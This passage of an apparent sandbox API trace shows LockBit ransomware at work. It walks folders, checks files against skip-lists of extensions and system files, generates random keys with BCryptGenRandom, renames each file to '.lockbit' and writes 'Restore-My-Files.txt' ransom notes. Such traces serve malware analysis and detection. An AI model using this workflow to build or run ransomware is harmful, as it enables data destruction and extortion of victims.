(lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01761_.WMF") returned 1 [0113.378] lstrcmpiW (lpString1="ntldr", lpString2="DD01761_.WMF") returned 1 [0113.378] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01761_.WMF") returned 1 [0113.378] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01761_.WMF") returned -1 [0113.378] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01761_.WMF") returned -1 [0113.378] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01761_.WMF") returned 1 [0113.378] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01761_.WMF") returned 1 [0113.378] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.378] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF") returned=".WMF" [0113.378] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.378] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.378] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.379] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.379] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF.lockbit") returned 72 [0113.379] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01761_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0113.388] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.388] malloc (_Size=0x40068) returned 0x3db04c0 [0113.389] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3db04d8 | out: lpFileSize=0x3db04d8*=4148) returned 1 [0113.389] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.389] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df04f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df04f4) returned 0x0 [0113.389] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.390] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df0504, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df0504) returned 0x0 [0113.390] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0113.393] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.393] malloc (_Size=0xa6) returned 0x77d7a8 [0113.393] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.394] free (_Block=0x77d7a8) [0113.394] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01761_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.394] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.394] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.394] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01772_.WMF", cAlternateFileName="")) returned 1 [0113.394] lstrcmpiW (lpString1=".", lpString2="DD01772_.WMF") returned -1 [0113.394] lstrcmpiW (lpString1="..", lpString2="DD01772_.WMF") returned -1 [0113.394] PathFindExtensionW (pszPath="DD01772_.WMF") returned=".WMF" [0113.394] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.394] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.394] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.394] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.394] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.394] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.394] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.395] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.395] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.396] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01772_.WMF") returned 1 [0113.396] lstrcmpiW (lpString1="ntldr", lpString2="DD01772_.WMF") returned 1 [0113.396] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01772_.WMF") returned 1 [0113.396] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01772_.WMF") returned -1 [0113.396] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01772_.WMF") returned -1 [0113.397] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01772_.WMF") returned 1 [0113.397] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01772_.WMF") returned 1 [0113.397] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.397] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned=".WMF" [0113.397] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.397] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.397] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.398] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.398] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.398] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.398] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.398] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.398] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.398] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.398] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF.lockbit") returned 72 [0113.398] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0113.405] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.405] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.405] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2300) returned 1 [0113.405] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.405] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.405] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.406] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.406] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.415] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.415] malloc (_Size=0xa6) returned 0x77d7a8 [0113.415] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.416] free (_Block=0x77d7a8) [0113.416] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.416] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.416] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.416] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xcb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01793_.WMF", cAlternateFileName="")) returned 1 [0113.416] lstrcmpiW (lpString1=".", lpString2="DD01793_.WMF") returned -1 [0113.416] lstrcmpiW (lpString1="..", lpString2="DD01793_.WMF") returned -1 [0113.416] PathFindExtensionW (pszPath="DD01793_.WMF") returned=".WMF" [0113.416] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.416] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.416] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.417] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.417] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.418] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01793_.WMF") returned 1 [0113.418] lstrcmpiW (lpString1="ntldr", lpString2="DD01793_.WMF") returned 1 [0113.418] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01793_.WMF") returned 1 [0113.418] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01793_.WMF") returned -1 [0113.418] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01793_.WMF") returned -1 [0113.418] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01793_.WMF") returned 1 [0113.418] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01793_.WMF") returned 1 [0113.418] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.418] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned=".WMF" [0113.419] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.419] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.419] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.420] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.lockbit") returned 72 [0113.420] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.420] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.421] malloc (_Size=0x40068) returned 0x3d70450 [0113.421] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3252) returned 1 [0113.421] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.421] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0113.421] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.422] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0113.422] ReadFile (in: hFile=0x2f4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0113.427] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.427] malloc (_Size=0xa6) returned 0x77d7a8 [0113.427] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.428] free (_Block=0x77d7a8) [0113.428] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.428] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.428] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.428] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, 